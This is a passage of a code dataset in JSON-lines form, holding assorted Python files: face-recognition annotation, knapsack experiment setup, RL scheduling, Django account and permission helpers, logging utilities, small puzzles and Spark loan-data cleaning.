(0,0,255)\nbgr_blue = (255,0,0)\nbgr_white = (255,255,255)\nEXTs = ['.jpg', '.png']\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--img_dir', type=str, default='img', help=\"Define the relative path where the capture images are.\")\n parser.add_argument('--db_path', type=str, required=True, help=\"The path to face vector csv. 
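Expected columns (as read below): 0 = image path, 1 = person name, 2+ = the face embedding values. 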
(like `path/to/faec_vec.csv`)\")\n parser.add_argument('--ans', type=str, help=\"True label name.\")\n args = parser.parse_args()\n\n db = pd.read_csv(args.db_path)\n db_vec = np.array(db[db.columns[2:]])\n db_name = np.array(db[db.columns[1]])\n db_path = np.array(db[db.columns[0]])\n\n tree = args.img_dir.split(\"/\")\n store_dir = os.path.join(*tree[:-1], f\"annotated_{tree[-1]}\")\n if not os.path.isdir(store_dir):\n os.mkdir(store_dir)\n\n t=0; f=0\n for fn in tqdm(sorted(os.listdir(args.img_dir))):\n if os.path.splitext(fn)[-1].lower() in EXTs:\n path = os.path.join(args.img_dir, fn)\n to_path = os.path.join(store_dir, fn)\n img = cv2.imread(path)\n locations = face_locations(img)\n if len(locations) == 1:\n top, right, bottom, left = locations[0]\n face = img[top:bottom, left:right]\n query_vec = face_encodings(face)\n if len(query_vec) != 0:\n top_1_index = np.argmin(np.sum((db_vec - query_vec) ** 2, axis=1))\n name = db_name[top_1_index]\n if name==args.ans:\n t+=1\n label=\"True\"\n else:\n f+=1\n label=\"False\"\n # Draw Bounding Box and T/F\n cv2.rectangle(img, (left, top), (right, bottom), bgr_blue, 2)\n cv2.putText(img, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, bgr_white, 1)\n cv2.imwrite(filename=to_path, img=img)\n\n print(f\"True: {t}\")\n print(f\"False: {f}\")\n","sub_path":"Face-Time-Card/Frame2img.py","file_name":"Frame2img.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618852480","text":"import math\n\n\ndef find_largest_palindrome(first_multiplier: int, second_multiplier: int):\n if len(str(first_multiplier)) != 3 and len(str(second_multiplier)) != 3:\n return False\n product = first_multiplier * second_multiplier\n\n for palindrome_counter in range(product, 11, - 1):\n product_string = str(palindrome_counter)\n product_string_length = len(product_string)\n half_length = int(math.floor(product_string_length / 2))\n first_string = []\n second_string = []\n\n for counter in range(0, half_length):\n first_string.append(product_string[counter])\n\n for counter in range(product_string_length - 1, half_length - 1, -1):\n second_string.append(product_string[counter])\n\n if is_a_palindrome(first_string, second_string):\n return palindrome_counter\n\n return 1\n\n\ndef is_a_palindrome(first: list, second: list):\n return first == second\n\n\nprint(find_largest_palindrome(999, 919))\n","sub_path":"python/4-largest-palindrome-of-two-3-digit-numbers.py","file_name":"4-largest-palindrome-of-two-3-digit-numbers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"371689519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 3 14:34:03 2017\n\n@author: Pablo Franco (jpfranco123@gmail.com)\n\nInstance Random Selection and order Randomisation (KS-IC project)\n\n@Dependencies:\ninstanceSelctionFunctions.py\n\n@Input:\nGenerated Instance Files:\n 1. Solver specific: e.g. mzn-6-dm-1.csv\n 2. General Instance metrics: e.g. metrics-6-dm-1.csv\n\n@Output:\n1. Instance .txt files structured for Knapsack Unity game named in order i1.txt, i2.txt,...\nA. Decision: Instances:\nweights:[48,34,43,32,20,44]\nvalues:[26,24,34,47,17,11]\ncapacity:90\nprofit:100\nproblemID:98-0.41-0.63\ninstanceType:1\nsolution:0\n\nB. 
Optimistion Instances:\nweights:[29,8,19,41,40,32]\nvalues:[47,40,39,44,23,11]\ncapacity:69\nproblemID:144-0.41\ninstanceType:1\nprofitAtOptimum:126\ncapacityAtOptimum:56\nsolutionItems:[1,1,1,0,0,0]\n\n2. param2.txt instance information files with order ransomisation\nnumberOfTrials:9\nnumberOfBlocks:2\nnumberOfInstances:18\ninstanceRandomization:[10,15,11,1,14,18,4,5,12,3,7,13,6,17,8,16,2,9]\n\n\n\"\"\"\n\nimport pandas as pd\nimport importlib\nimport os\n\n#Project folder\nfolder = '/Users/jfranco1/Google Drive/Melbourne/UNIMELB/Research/Complexity Project/'\nos.chdir( folder +'KS-IC/Instance Selection/')\n\n#Imports all of the required functions\nimport instanceSelctionFunctions as isf\nimportlib.reload(isf)\n\n### General Input ###\n\n#Files to be uploaded with respect to the number of items\nnItems=[6]#,15,20,25,30]\n\n#Number of order randomizations (i.e. number of param2.txt files)\nnOrderRandomizations=30\n\n\n\n### INPUT Decision Variant ###\nproblemIDDec='-dm-1'\nfolderInputDec= folder + 'Data/Simulations Data/KS decision/'\nfolderOutDec= folder + 'KS-IC/Data/Simulations/instanceSelectionOutput/decision/'\n\n#number of bins to allocate ncapacity and nprofits to bins\nnbins=20\n\n#Normalized capacity from which to sample instances\nnCap=0.4\n\n#Normalized profit from which to sample IN-Phase-Transition instanes\nnProf=0.6\n\n#Normalized profit from which to sample OUT-OF-Phase-Transition instanes\nnProfNO=0.85\nnProfYES=0.35\n\n#How to categorize easy/hard IN-Phase-Transition\nquantileLow=0.5\nquantileUpper=0.5\n\n#bN blocks of tN trials\n#requires tN to be multiple of nTypes\ntNDec=24\nbNDec=3\nnTypesDec=6\n\n\n### INPUT Optimisation Variant ###\nproblemIDOpt='-rm-1'\nfolderInputOpt= folder + 'Data/Simulations Data/KS optimisation/'\nfolderOutOpt= folder + 'KS-IC/Data/Simulations/instanceSelectionOutput/optimisation/'\n\n#bN blocks of tN trials\n#requires tN to be multiple of the number of instances types there are\ntNOpt=9\nbNOpt=2\n#An array with possible types\npossibleTypesOpt=[1,3,5]\n\n\n### Decision Task instance selection\n\n## DATA UPLOAD\ndataMZN=isf.importSolvedInstances(nItems,'mzn',folderInputDec,problemIDDec)\n\n#Allocates ncapacity and nprofits to bins (BINS are defined with repect to left edge (i.e. nCap=0.5 means nCap in [0.5,0.5+binSize] ))\n### Add instance type ([1,6]) tp data according to the inputs\n#nProf: Normalized profit to sample within phase transition\n#nCap: Normalized profit to sample within phase transition\n#nProfNO: Normalized profit to sample outside the phase transition where there is NO solution\n#nProfYes: Normalized profit to sample outside the phase transition where there IS a solution\n#quantileLow: Easy instances at (nProf, nCap) are those below the quantileLow\n#quantileHigh: Hard instances at (nProf, nCap) are those above the quantileHigh\n## OutPut: 1=nProf-easy-NoSolution 2==nProf-easy-Solution 3=nProf-hard-NoSolution\n## 3=nProf-hard-Solution 5=nProfNo-NOSolution 6=nProfYES-Solution\n\n####################\n## Taking instance categorized according to MZN\n\ndataM=dataMZN[0]\ndataM=isf.binCapProf(dataM,nbins)\ndataM=isf.addInstanceType(dataM,nCap,nProf,nProfNO,nProfYES,quantileLow,quantileUpper,'propagations')\ndataDec=dataM\n\n## SAMPLING of Instances\n\n# Samples randomly from each instance-type sampleSizePerBin\n# Output: list of sublists. 
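(one sublist per instance type; an illustrative shape would be [[id1, id2, ...], [id3, ...], ...] with made-up ids). 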
Each sublist has sampleSizePerBin size with the instances ID\n# Sampling is done withOUT replacement\nsizePerBin=int(tNDec*bNDec/(nTypesDec+2))\n#Total number (Including all blocks) instances per Type\nsampleSizePerBin=[sizePerBin,sizePerBin,sizePerBin,sizePerBin,2*sizePerBin,2*sizePerBin]\npossibleTypesDec=range(1,nTypesDec+1)\nsampleProblems=isf.sampleInstanceProblems3(dataDec,sampleSizePerBin,possibleTypesDec)\n\n#Exports all the instance files in the sampleProblems list\ninstanceNumber=1\nfor k in isf.flatten(sampleProblems):\n iw,iv,ic,ip,instanceType,solution=isf.extractInstance(dataDec,k)\n isf.exportInstance(iw,iv,ic,ip,k,instanceType,solution,folderOutDec,instanceNumber)\n instanceNumber=instanceNumber+1\n\n## INSTANCE ORDER GENERATION and param2.txt export\n\n# Generates the instance randomization order for bN blocks of tN trials for nTypes instance types\nnInstances=tNDec*bNDec\nfor i in range(0,nOrderRandomizations):\n instanceOrder=isf.generateInstanceOrder(tNDec, bNDec,sampleSizePerBin)\n isf.exportTaskInfo(tNDec,bNDec,instanceOrder,nInstances,folderOutDec,i) #Exports 'param2.txt' with the required input for the task\n\nsampleProblemsDec=sampleProblems\n\n\n### Optimisation Task instance selection\n\n### Data Upload\ndataMZN=isf.importSolvedInstances(nItems,'mzn',folderInputOpt,problemIDOpt)\n\n### Instance Type Attachment\ndataOpt=dataMZN[0]\n\n# Calculates nprofit for the optimization case (i.e. the optimum normalized profit)\ndataOpt=isf.calculateOptimum(dataOpt)\n\n# Merges Optimization data and relevant decision columns.\n# Aim: Add instance type from decision Problem to Optimization Problem\n# Warning: Here each optimization problem is mapped into many decion problems\ndataOptDec=isf.mergeOptDec(dataDec, dataOpt)\n\n\n#Keep only those instances where the nProfit of Decision problem (not binned) is the closest to nprofitOpt s.t. nprofitNoBinDec>nprofitOpt\n#This gives us instances that have solution: NO\ndataOptDec=isf.removeRepeatedOptInstances2(dataOptDec)\n\n\n### Sample Instances\n\nnTypesOpt=len(possibleTypesOpt)\nsizePerBin=int(tNOpt*bNOpt/(nTypesOpt))\nsampleSizePerBin=[sizePerBin,sizePerBin,sizePerBin]\n#sampleSizePerBin=int(tNOpt*bNOpt/nTypesOpt)\n\n# Samples randomly from each instance-type sampleSizePerBin\n# Output: list of sublists. 
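(here one sublist per entry of possibleTypesOpt, i.e. instance types 1, 3 and 5). 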
Each sublist has sampleSizePerBin size with the instances ID\nsampleProblems=isf.sampleInstanceProblems3(dataOptDec,sampleSizePerBin,possibleTypesOpt)\n\n#Exports all the instance files in the sampleProblems list\ninstanceNumber=1\nfor k in isf.flatten(sampleProblems):\n iw,iv,ic,instanceType,pOpt,cOpt,itemsOpt=isf.extractInstanceOpt(dataOptDec,k)\n isf.exportInstanceOpt(iw,iv,ic,k,instanceType,folderOutOpt,instanceNumber,pOpt,cOpt,itemsOpt)\n instanceNumber=instanceNumber+1\n\n## INSTANCE ORDER GENERATION and param2.txt export\n\n# Generates the instance randomization order for bN blocks of tN trials for nTypes instance types\nnInstances=tNOpt*bNOpt\nfor i in range(0,nOrderRandomizations):\n instanceOrder=isf.generateInstanceOrder(tNOpt, bNOpt,sampleSizePerBin)\n isf.exportTaskInfo(tNOpt,bNOpt,instanceOrder,nInstances,folderOutOpt,i)#Exports 'param2.txt' with the required input for the task\n\nsampleProblemsOpt=sampleProblems\n","sub_path":"Code/Instance Selection/instanceSelectionBehavExp.py","file_name":"instanceSelectionBehavExp.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"378069358","text":"def get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n # Create a dict with the index positions and weight values\n # Look for pairs by looping through the weights, checking our dictionary for a number that is equal to the limit minus the current weight(target weight)\n \n cache = {}\n\n for i in range(length):\n cache[weights[i]] = i\n \n for i, w in enumerate(weights):\n targetWeight = limit - w\n if targetWeight in cache:\n if i > cache[targetWeight]:\n return (i, cache[targetWeight])\n return (cache[targetWeight], i)\n \n return None\n ","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"479262012","text":"import datetime, os\nfrom time import strftime, localtime\n\n\nclass LogMsg:\n ''' this a debug class, use to logit debug message in a file '''\n\n def __init__(self):\n self.logit_path = \"/usr/hcams/logs/\"\n self.file_name = \"debug.log\"\n self.server_name = \"\"\n self.num = \"0\"\n\n def init_log(self):\n date = strftime(\"%Y%m%d\", localtime())\n file_path_date = \"%s%s.%s\" % (self.logit_path, self.file_name, date)\n file_path = \"%s%s\" % (self.logit_path, self.file_name)\n self.fd = file(file_path_date, 'a', 1)\n self.fp = file(file_path, 'a', 1)\n\n def __check_logfile__(self):\n date = strftime(\"%Y%m%d\", localtime())\n file_path_date = \"%s%s.%s\" % (self.logit_path, self.file_name, date)\n if not os.path.exists(file_path_date):\n file_path = \"%s%s\" % (self.logit_path, self.file_name)\n self.end_log()\n try:\n os.remove(file_path)\n except OSError:\n pass\n self.init_log()\n\n def logit(self, message):\n self.__check_logfile__()\n now = strftime(\"%Y-%m-%d %H:%M:%S\", localtime())\n string = \"[%s]\" % now\n if self.server_name != \"\" and self.num != \"0\":\n string += \"[%s:%s]\" % (self.server_name, self.num)\n elif self.server_name != \"\":\n string += \"[%s]\" % self.server_name\n string += \" %s\\n\" % message \n self.fd.write(string)\n self.fp.write(string)\n\n def end_log(self):\n self.fd.close()\n 
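# the date-stamped handle is closed above; also release the rolling debug.log handle\n        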
self.fp.close()\n\n","sub_path":"python/python-modules/logging/Log-01.py","file_name":"Log-01.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"593945048","text":"from .node import Node\n\n\nclass ExecutionNode(Node):\n type = 'execution'\n\n def __init__(\n self,\n *,\n name,\n step,\n override=None\n ) -> None:\n if override is None:\n override = {}\n self.name = name\n self.step = step\n self.override = override\n\n def lint(self, lint_result, context: dict) -> None:\n super().lint(lint_result, context)\n config = context['config']\n pipeline = context['pipeline']\n if self.step not in config.steps:\n lint_result.add_error('Pipeline {pipeline} node {node} step {step} does not exist'.format(\n pipeline=pipeline.name,\n node=self.name,\n step=self.step,\n ))\n","sub_path":"valohai_yaml/objs/pipelines/execution_node.py","file_name":"execution_node.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"362386568","text":"\"\"\"This script runs the simulation\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom environment import Environment\nfrom parameters import Parameters\nfrom functions import run_episode, compute_returns, zero_pad, compute_baselines, compute_advantages, create_jobs, plot_iter, plot_rew, plot_iter_2, plot_test_bars, early_stopping, plot_memory_usage, plot_diff_memory_usage\nfrom policy_network import PolicyGradient\n\n# Create an object of parameters\nparam = Parameters()\n\n# Create the environment with the desired parameters\nenv = Environment(param)\n\n# Create the policy network\npg_network = PolicyGradient()\n\n# Build placeholders and operations\npg_network.build(env, param)\n\n# Visualization\navg_episode_duration = []\navg_job_duration = []\navg_reward = []\n\njobsets = [create_jobs(param.jobs_types, param.number_jobs, param) for jobset in range(param.jobsets)]\n\nfor iteration in tqdm(range(param.iterations)):\n if not early_stopping(avg_reward, param.patience):\n states_jobsets = []\n actions_jobsets = []\n rewards_jobsets = []\n advantages_jobsets = []\n\n # Visualization\n avg_episode_duration_jobset = []\n avg_job_duration_jobset = []\n avg_reward_jobset = []\n\n for jobset in jobsets:\n\n states_episodes = []\n actions_episodes = []\n rewards_episodes = []\n\n # Visualization\n avg_job_duration_ep_list = []\n total_reward_episodes = []\n\n # For each episode record the states, actions and rewards per time-step and store them in corresponding lists\n for episode in range(param.episodes):\n states, actions, rewards, avg_job_duration_ep, _ = run_episode(env, jobset, pg_network)\n\n states_episodes.append(states)\n actions_episodes.append(actions)\n rewards_episodes.append(rewards)\n\n # Visualization\n avg_job_duration_ep_list.append(avg_job_duration_ep)\n total_reward_episodes.append(sum(rewards))\n\n # Compute returns\n returns = [compute_returns(rewards, param.gamma) for rewards in rewards_episodes]\n\n # Zero pad returns to have equal length\n zero_padded_returns = zero_pad(returns)\n\n # Compute baselines\n baselines = compute_baselines(zero_padded_returns)\n\n # Compute advantages\n advantages = compute_advantages(returns, baselines)\n\n states_jobsets.append(states_episodes)\n actions_jobsets.append(actions_episodes)\n rewards_jobsets.append(rewards_episodes)\n advantages_jobsets.append(advantages)\n\n # Visualization\n # Store in a list the avg duration of 
the jobs of all the episodes of the iteration\n avg_job_duration_jobset.append(sum(avg_job_duration_ep_list) / param.episodes)\n # Store average episode duration\n avg_episode_duration_jobset.append(np.mean([i.shape[0] for i in states_episodes]))\n # Store average episode reward\n avg_reward_jobset.append(sum(total_reward_episodes) / param.episodes)\n\n # Update weights\n for j in range(param.jobsets):\n for i in range(param.episodes):\n pg_network.optimize_pg(states_jobsets[j][i], actions_jobsets[j][i], advantages_jobsets[j][i], param.lr)\n\n # Visualization\n # Store in a list the avg duration of the jobs of all the episodes of the iteration\n avg_job_duration.append(sum(avg_job_duration_jobset) / param.jobsets)\n # Store average episode duration\n avg_episode_duration.append(sum(avg_episode_duration_jobset) / param.jobsets)\n # Store average iteration episode reward\n avg_reward.append(sum(avg_reward_jobset) / param.jobsets)\n else:\n break\n\n# How does the process look like step by step for the training jobsets\nprint(\"Training-jobsets:\")\nprint(\"\\nRL scheduler:\")\nfor i, jobset in enumerate(jobsets):\n print(\"\\nJobset \" + str(i) + \":\")\n states, actions, rewards, train_RL, train_memory_RL = run_episode(env, jobset, pg_network, info=True)\n\nprint(\"\\nLB scheduler:\")\nlb_list = []\nfor i, jobset in enumerate(jobsets):\n print(\"\\nJobset \" + str(i) + \":\")\n states, actions, rewards, train_LB, train_memory_LB = run_episode(env, jobset, pg_network, scheduler='LB', info=True)\n lb_list.append(train_LB)\nlb_duration = np.mean(lb_list)\n\n# How does the process look like step by step for a test-jobset\nprint(\"\\nTest-jobset:\")\ntest_jobset = create_jobs(param.jobs_types, 20, param)\nprint(\"\\nRL scheduler:\")\nstates, actions_x, rewards, test_RL, test_memory_RL = run_episode(env, test_jobset, pg_network, info=True)\nprint(\"\\nLB scheduler:\")\nstates, actions_y, rewards, test_LB, test_memory_LB = run_episode(env, test_jobset, pg_network, info=True, scheduler='LB')\n\nprint('\\nAverage episode durations training jobsets: ' + str(avg_episode_duration))\nprint('Average job durations training jobsets: ' + str(avg_job_duration))\n\nprint('\\nTest jobset actions RL:' + str(actions_x))\nprint('Test jobset avg. job duration RL:' + str(test_RL))\n\nprint('\\nTest jobset actions LB:' + str(actions_y))\nprint('Test jobset avg. job duration LB:' + str(test_LB))\n\n# plot_iter(avg_episode_duration, 'Avg. episode duration')\nfolder = 'Test18'\nplot_iter_2(avg_job_duration, lb_duration, 'Avg. job duration', folder)\nplot_rew(avg_reward, 'Avg. 
total reward', folder)\nplot_test_bars(train_RL, train_LB, 'Training set', 'final_duration_training.png', folder)\nplot_test_bars(test_RL, test_LB, 'Test set', 'duration_test.png', folder)\nplot_memory_usage(train_memory_RL, train_memory_LB, 'memory_usage_training.png', folder)\nplot_memory_usage(test_memory_RL, test_memory_LB, 'memory_usage_test.png', folder)\nplot_diff_memory_usage(train_memory_RL, train_memory_LB, 'diff_memory_usage_training.png', folder)\nplot_diff_memory_usage(test_memory_RL, test_memory_LB, 'diff_memory_usage_test.png', folder)\n","sub_path":"other/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625347848","text":"# _*_ coding:utf-8 _*_\nimport logging\nimport os.path\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__)).replace('/', '\\\\')\n\nLOG_TYPE = {\n 'command': 'command.log',\n 'transport': 'transport.log',\n}\n\n\ndef logger(log_type):\n\n # create logger\n logger = logging.getLogger(LOG_TYPE[log_type])\n logger.setLevel(logging.INFO)\n\n # log formatter\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n # log file\n log_file = os.path.join(BASE_DIR, 'log/%s' % LOG_TYPE[log_type])\n\n # create filehandler\n access_handler = logging.FileHandler(log_file)\n access_handler.setFormatter(formatter)\n\n # add to handler\n logger.addHandler(access_handler)\n return logger","sub_path":"learning/stage4/fabric/module/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"75183739","text":"import os\nimport sys\nimport datetime\nfrom sauron import logger\n\n# Append our current path before this import\np = os.path.dirname(os.path.abspath(__file__))\nif p not in sys.path:\n sys.path.insert(0, p)\n\n\nclass MetricException(Exception):\n def __init__(self, message):\n self.msg = message\n def __repr__(self):\n return repr(self.msg)\n def __str__(self):\n return str(self.msg)\n\n\nclass Metric(object):\n def __init__(self, name, keys=[], **kwargs):\n Metric.reconfig(self, name, keys)\n\n def reconfig(self, name, keys=[], **kwargs):\n self.name = name\n self.keys = keys\n\n def getValues(self):\n if self.keys:\n results = self.values()\n pruned = {}\n for k in self.keys:\n try:\n pruned[k] = results['results'][k]\n except KeyError:\n logger.warn('Key %s unavailable' % k)\n results['results'] = pruned\n return results\n else:\n return self.values()\n\n def values(self):\n return {'results': {'key': (0, 'Count')},\n 'time': datetime.datetime.now()}\n","sub_path":"sauron/metrics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"88520029","text":"import math\n\n\ndef countPrime(x):\n if x < 2:\n return 1\n count = 0\n tmp = x\n for i in range(2, int(math.sqrt(x)) + 1):\n while tmp % i == 0:\n tmp //= i\n count += 1\n if tmp != 1:\n count += 1\n return count\n\n\ndef count_Kprimes(k, start, nd):\n return [x for x in range(start, nd + 1) if countPrime(x) == k]\n\n\ndef puzzle(s):\n res = set()\n for a in range(2, int(math.ceil(s // 2)) + 1):\n x = countPrime(a)\n if x not in {1, 3, 7}:\n continue\n for b in range(a + 1, int(math.ceil(s // 2)) + 1):\n y = countPrime(b)\n if y not in {1, 3, 7} or y == x:\n continue\n c = s - a - b\n z = countPrime(c)\n if z in {1, 3, 7} 
and z != x and z != y:\n                res.add(tuple(sorted([a, b, c])))\n    return len(res)\n\n\nprint(puzzle(290))\n","sub_path":"codewar/2021/k-Primes.py","file_name":"k-Primes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"636696820","text":"from django import forms\nfrom .models import Car\nfrom django.forms.utils import ValidationError\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.db import transaction\n\nclass Car_Part_Form(forms.ModelForm):\n    class Meta:\n        model = Car\n        fields = [\n            'Car_name',\n            'Car_model',\n            'Car_Part_Name',\n            'Car_Part_Info',\n            'category',\n            'Car_Part_Discription',\n            'Owner_info',\n            'Part_Image',\n        ]\n\n","sub_path":"src/Car_Part_App/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"19778896","text":"\"\"\"\nCollection of methods intended to be used in account-related processes.\nThe provided methods include one to check if a user is locked out due to\nfailed login attempts, plus helpers to assign permissions to groups and users.\n\"\"\"\nfrom collections import OrderedDict, defaultdict\nfrom datetime import timedelta\n\nfrom django.contrib.auth.models import Permission, Group\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.utils import timezone\n\nfrom ttaa_base import constants\nfrom ttaa_base.models import Account_Locks\n\nUser = get_user_model()\n\n\ndef is_user_locked(user,\n                   attempts_limit=constants.LOGIN_ATTEMPTS_BEFORE_LOCK,\n                   delta_minutes=constants.SPAN_ACCOUNT_LOCK_MINUTES):\n    \"\"\" Check whether the user is barred from logging in after too many failed attempts\n\n    :param user: django user: user to check\n    :param attempts_limit: int: number of failed attempts that lock the account\n    :param delta_minutes: float/int: number of minutes the account stays\n    locked.\n    :return: bool: True if the user is locked, False if not.\n\n    \"\"\"\n\n    # from the locks, select the ones that belong to this user\n    locks = Account_Locks.objects.filter(user=user)\n\n    # no record of locks: the user is free\n    if not locks:\n        return False\n\n    starting = locks[0].timestamp\n    attempts = locks[0].attempts\n\n    # validity window of the lock\n    until = starting + timedelta(seconds=60 * delta_minutes)\n    record_is_old = until < timezone.now()\n\n    # if the record is old enough, or the attempts are below the limit,\n    # the user is free\n    if record_is_old or attempts < attempts_limit:\n        return False\n\n    # any other case: user locked\n    return True\n\n\ndef group_permissions_sort(user):\n    \"\"\"\n    Returns a dictionary where the keys are the different models and the\n    values are the permissions (in human-friendly format) that the\n    user can access.\n\n    :param user: user instance\n    :return: OrderedDict: dictionary of permissions organized by module\n\n    \"\"\"\n    perm_dict = defaultdict(list)\n    u_permissions = list(Permission.objects.filter(user=user))\n    g_permissions = list(Permission.objects.filter(group__user=user))\n\n    for p in u_permissions + g_permissions:\n        type_ = str(p.content_type).title()  # capitalize first letter\n        if p.name not in perm_dict[type_]:\n            perm_dict[type_].append(p.name)\n    sorted_perms = OrderedDict(sorted(perm_dict.items()))\n\n    return sorted_perms\n\n\n@transaction.atomic\ndef add_user_permissions(permissions_list, users):\n    \"\"\"\n    Intended to be used with 
the default user permissions.\n    :param permissions_list: list: list of strings with the permission\\\n    codenames the target user will receive\n    :param users: list: list of usernames that will receive the permissions\n\n    :return: bool: True if assignment was successful, False if not\n    \"\"\"\n    permissions = Permission.objects.filter(codename__in=permissions_list)\n    try:\n        for username in users:\n            target_user = User.objects.get(username=username)\n            target_user.user_permissions.add(*permissions)\n    except Exception as e:\n        print(e)\n        return False\n    return True\n\n\n@transaction.atomic\ndef add_groups_permissions(groups_permissions):\n    \"\"\" Assign a list of permissions to the given groups\n\n    :param groups_permissions: dict: dictionary where the keys are the \\\n    group names and the values are the permission strings that the group \\\n    receives.\n    :return: bool: True if assignment was successful, False if not\n    \"\"\"\n\n    try:\n        for group_name in groups_permissions.keys():\n            group = groups_permissions[group_name]\n            permissions = group['permissions']\n            inherit = group['inherit']\n\n            if inherit and inherit in groups_permissions.keys():\n                inherit_group = groups_permissions[inherit]\n                permissions += inherit_group['permissions']\n\n            target_group = Group.objects.get(name=group_name)\n            grants = Permission.objects.filter(codename__in=permissions)\n            if grants:\n                target_group.permissions.add(*grants)\n                target_group.save()\n    except Exception as e:\n        print(e)\n        return False\n    return True\n","sub_path":"predictvenv/Lib/site-packages/ttaa_base/helpers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"567067044","text":"\"\"\"Input and output helpers to load in data.\n\"\"\"\nimport numpy as np\n\ndef read_dataset_tf(path_to_dataset_folder, index_filename):\n    \"\"\" Read dataset into numpy arrays with preprocessing included\n    Args:\n        path_to_dataset_folder(str): path to the folder containing samples and indexing.txt\n        index_filename(str): indexing.txt\n    Returns:\n        A(numpy.ndarray): sample feature matrix A = [[1, x1],\n                                                     [1, x2],\n                                                     [1, x3],\n                                                     .......]\n                          where xi is the 16-dimensional feature of each sample\n\n        T(numpy.ndarray): class label vector T = [[y1],\n                                                  [y2],\n                                                  [y3],\n                                                  ...]\n                          where yi is 1/0, the label of each sample\n    \"\"\"\n    ###############################################################\n    # Fill your code in this function\n    ###############################################################\n    # 
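Each line of indexing.txt pairs a label with a sample path (e.g. \"1 path.txt\" or \"-1 path.txt\"), as parsed below. 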
Hint: open(path_to_dataset_folder+'/'+index_filename,'r')\n f = open(path_to_dataset_folder + '/' + index_filename, 'r')\n features = f.readlines()\n T = []\n A = []\n for i in features:\n txtpath = i.strip('\\n')\n if(txtpath[0] == '-'):\n txtpath = txtpath[3:]\n label = int(0)\n else:\n txtpath = txtpath[2:]\n label = int(i[0])\n T.append(label)\n txtfile = open(path_to_dataset_folder + '/' + txtpath, 'r')\n x = txtfile.readline().strip('\\r\\n')\n x_arr = x[3:].split()\n x_arr = [float(i) for i in x_arr]\n x_arr = [1]+x_arr\n A.append(x_arr)\n A = np.array(A)\n T = np.transpose([np.array(T)])\n #print(\"T:\", T)\n #print(\"T:\", np.shape(T) )\n #print(\"A\", np.shape(A))\n return A,T\n","sub_path":"Logistic_model/codefromtf/io_tools.py","file_name":"io_tools.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"175761217","text":"#Test\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfrom pyspark.sql import SQLContext, Window, SparkSession\nfrom pyspark import SparkConf, SparkContext, HiveContext\nfrom pyspark.sql.functions import lit, row_number, monotonically_increasing_id, isnan, when, count, col, avg, udf\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.types import TimestampType\n\n\nconf = SparkConf().setMaster(\"yarn\").set('spark.sql.warehouse.dir' , '/user/hive/warehouse')\nsc = SparkContext(conf = conf)\n\nsqlContext = HiveContext(sc)\n\nprint('1. Cleaning Data')\nprint('1.1 Importing Raw Data')\nIn_Df = sqlContext.read.csv('/Input/loan.csv' , header=True, inferSchema=True)\n\n#Create the database for working with\nsqlContext.sql(\"\"\"create database work_db\"\"\")\n\n#Add an ID variable\nprint('1.1 Creating ID variable')\nIn_Df = In_Df.withColumn('id', monotonically_increasing_id())\nIn_Df = In_Df.drop('member_id') #Drop Member ID because it is Blank\n\n#Drop columns we dont need\nprint('1.2 Dropping unneccesary columns')\nIn_Df = In_Df.drop('url') #A cryptic column with only one value\nIn_Df = In_Df.drop('desc') # A Text column, not much can be extracted from this\nIn_Df = In_Df.drop('zip_code') #Unrelated to default rates\n\n#Create binary default variable\nprint('1.3 Creating binary Default variable')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select *\n , case when loan_status like '%Fully Paid%' then 0\n when loan_status like '%Current%' then 0\n when loan_status like 'Late (16-30 days)' then 0\n else 1\n end as Default_Ind\n from In_Df\n where loan_status != 'Oct-2015'\n\"\"\")\n\n\nprint('1.4 Dropping unneccesary columns')\nIn_Df = In_Df.drop('debt_settlement')\nIn_Df = In_Df.drop('debt_settlement_flag')\nIn_Df = In_Df.drop('debt_settlement_flag_date')\nIn_Df 